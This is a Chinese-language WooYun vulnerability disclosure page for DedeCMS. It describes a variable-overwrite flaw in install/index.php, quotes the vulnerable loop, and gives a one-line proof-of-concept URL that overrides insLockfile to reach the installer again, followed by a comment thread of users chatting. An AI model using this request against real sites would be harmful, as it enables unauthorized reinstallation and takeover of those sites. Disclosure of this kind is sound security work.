当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(77) 关注此漏洞

缺陷编号: WooYun-2013-25188

漏洞标题: dedecms变量覆盖漏洞,可重装网站

相关厂商: Dedecms

漏洞作者: VIP

提交时间: 2013-06-05 14:14

公开时间: 2013-06-10 14:15

漏洞类型: 未授权访问/权限绕过

危害等级: 中

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

3人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-05: 细节已通知厂商并且等待厂商处理中
2013-06-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

dedecms的install/index.php中,有这样一段代码

code 区域
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}



任何传入的变量都会被定义,导致变量覆盖漏洞,可以通过覆盖insLockfile变量,破坏原来程序的逻辑,重装网站。

POC:

http://127.0.0.1/dede/install/index.php?insLockfile=1

漏洞证明:

直接访问,提示有安装锁。

d01.jpg



变量覆盖后,直接进入安装界面

d02.jpg

修复方案:

去掉这段代码,使用其他更安全的方式。

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-06-10 14:15

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-06-05 14:25 | LauRen ( 路人 | Rank:4 漏洞数:1 | 苦逼屌丝一枚。)
    0

    沙发,做等公开

  2. 2013-06-05 14:35 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)
    0

    DEDECMS无尽的洞

  3. 2013-06-05 14:40 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)
    0

    小学六年级 必须mark

  4. 2013-06-05 15:01 | 偉哥 ( 实习白帽子 | Rank:69 漏洞数:12 | 哥是没帽子)
    0

    小学六年级 必须mark

  5. 2013-06-05 15:07 | 紫藤居士 ( 实习白帽子 | Rank:43 漏洞数:8 | 我是来向大神们学习的)
    0

    小学六年级 必须mark

  6. 2013-06-05 15:22 | SunnyJay ( 路人 | Rank:11 漏洞数:1 | 专业打酱油~)
    0

    小学六年级 必须mark

  7. 2013-06-05 15:31 | by_奇奇 ( 实习白帽子 | Rank:43 漏洞数:8 | 2)
    0

    小学六年级 必须mark

  8. 2013-06-05 16:18 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:129 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    - -........ VIP 你是想逆天?

  9. 2013-06-05 16:18 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:129 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    擦,上错号了- -

  10. 2013-06-05 16:20 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)
    0

    - -........ VIP 你是想逆天? 擦,上错号了- -

  11. 2013-06-05 16:24 | VIP ( 普通白帽子 | Rank:774 漏洞数:100 )
    0

    @小胖子 啥号啊

  12. 2013-06-05 16:27 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
    0

    - -........ VIP 你是想逆天? 擦,上错号了- -

  13. 2013-06-05 16:35 | 戏子_AINI ( 路人 | Rank:21 漏洞数:7 | 我是一只小小小小鸟,想要飞却飞也飞不高。...)
    0

    围观小学6年级

  14. 2013-06-05 16:38 | 孤独雪狼 认证白帽子 ( 普通白帽子 | Rank:740 漏洞数:64 | 七夕手机被偷,这坑爹的七夕啊 。。。。)
    0

    小学六年级 必须mark

  15. 2013-06-05 16:53 | 偉哥 ( 实习白帽子 | Rank:69 漏洞数:12 | 哥是没帽子)
    0

    小学六年级 必须mark

  16. 2013-06-05 16:58 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)
    0

    mark

  17. 2013-06-05 17:00 | mango ( 核心白帽子 | Rank:2081 漏洞数:300 | 解决问题的第一步,是要承认问题的存在。)
    0

    这个洞不会是那个吧。。。。

  18. 2013-06-05 17:02 | VIP ( 普通白帽子 | Rank:774 漏洞数:100 )
    0

    @mango 哪个

  19. 2013-06-05 17:05 | mango ( 核心白帽子 | Rank:2081 漏洞数:300 | 解决问题的第一步,是要承认问题的存在。)
    0

    我看不见你这个。。。所以不能判断。。。。so,应该不是吧,或者我看错了。

  20. 2013-06-05 17:07 | VIP ( 普通白帽子 | Rank:774 漏洞数:100 )
    0

    @mango 哪个啊

  21. 2013-06-05 17:10 | mango ( 核心白帽子 | Rank:2081 漏洞数:300 | 解决问题的第一步,是要承认问题的存在。)
    0

    我上次在微博上也看到这个安装漏洞,不知道是不是你这个覆盖的。

  22. 2013-06-05 17:18 | mango ( 核心白帽子 | Rank:2081 漏洞数:300 | 解决问题的第一步,是要承认问题的存在。)
    0

    @VIP跟你商量个事呗。。。能不能转点乌云币给我,我想买那件乌云衣服可是要30大洋啊~

  23. 2013-06-05 17:40 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
    0

    这个漏洞,t00ls发过了吧。小学生,不要抄作业哦。。, install 那个

  24. 2013-06-05 17:59 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)
    0

    我也好像在几天前就听过重装漏洞了 - -

  25. 2013-06-05 18:19 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)
    0

    为啥要发出来呢。我都没玩够

  26. 2013-06-05 18:40 | VIP ( 普通白帽子 | Rank:774 漏洞数:100 )
    1

    @mango 要多少?

  27. 2013-06-05 18:41 | VIP ( 普通白帽子 | Rank:774 漏洞数:100 )
    0

    @围剿 我没有t00ls帐号啊

  28. 2013-06-05 18:56 | Master ( 实习白帽子 | Rank:33 漏洞数:6 )
    0

    @VIP 话说你是不是六年级的小学生啊,我很好奇啊

  29. 2013-06-05 19:02 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1643 漏洞数:189 | 学无止境)
    0

    比起你们猜测,我更愿意相信六年级的小朋友也有代码审计的能力!嘿嘿:D

  30. 2013-06-05 19:10 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:47 | 我思故我猥琐,我猥琐故我强大)
    0

    小学六年级 必须mark

  31. 2013-06-05 19:14 | VIP ( 普通白帽子 | Rank:774 漏洞数:100 )
    0

    @xsjswt 赶集网的大牛,必须关注

  32. 2013-06-05 21:26 | 冷静 ( 路人 | Rank:3 漏洞数:2 )
    0

    @xsjswt 拜超级猥琐大牛,膜拜赶集网云监控,求开源,求share

  33. 2013-06-05 21:58 | mango ( 核心白帽子 | Rank:2081 漏洞数:300 | 解决问题的第一步,是要承认问题的存在。)
    0

    @VIP 还差17点 谢谢了。~ 我真么挺喜欢的。

  34. 2013-06-05 23:48 | 疯子 ( 普通白帽子 | Rank:259 漏洞数:45 | 世人笑我太疯癫,我笑世人看不穿~)
    0

    - -........ VIP 你是想逆天? 擦,上错号了- -

  35. 2013-06-06 01:03 | 小鸡鸡 ( 实习白帽子 | Rank:40 漏洞数:4 )
    0

    需要数据库帐号密码吗

  36. 2013-06-06 09:43 | iproute ( 路人 | Rank:4 漏洞数:1 | 为路由器生,为交换机死,为Ping通奋斗一辈...)
    0

    小学六年级 必须mark

  37. 2013-06-06 13:30 | erevus ( 普通白帽子 | Rank:197 漏洞数:31 )
    0

    小学六年级 必须mark

  38. 2013-06-07 02:39 | Fuzz ( 路人 | Rank:1 漏洞数:1 )
    0

    我抓的包 不会出现cookie值,我改了post值也没用。求解!

  39. 2013-06-07 13:46 | leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)
    0

    小学六年级 必须mark

  40. 2013-06-08 09:49 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)
    0

    小学六年级 必须mark

  41. 2013-06-10 22:59 | RootUser ( 路人 | Rank:22 漏洞数:5 | null)
    0

    你确定这个是你自己挖的?我好像前段时间就看到过了

  42. 2013-10-21 16:57 | Huc-Unis ( 普通白帽子 | Rank:1228 漏洞数:82 | 专业使用明小子找漏洞)
    0

    我居然发现dedecms的全部都是忽略,以后谁还敢给他提交漏洞?

登录后才能发表评论,请先 登录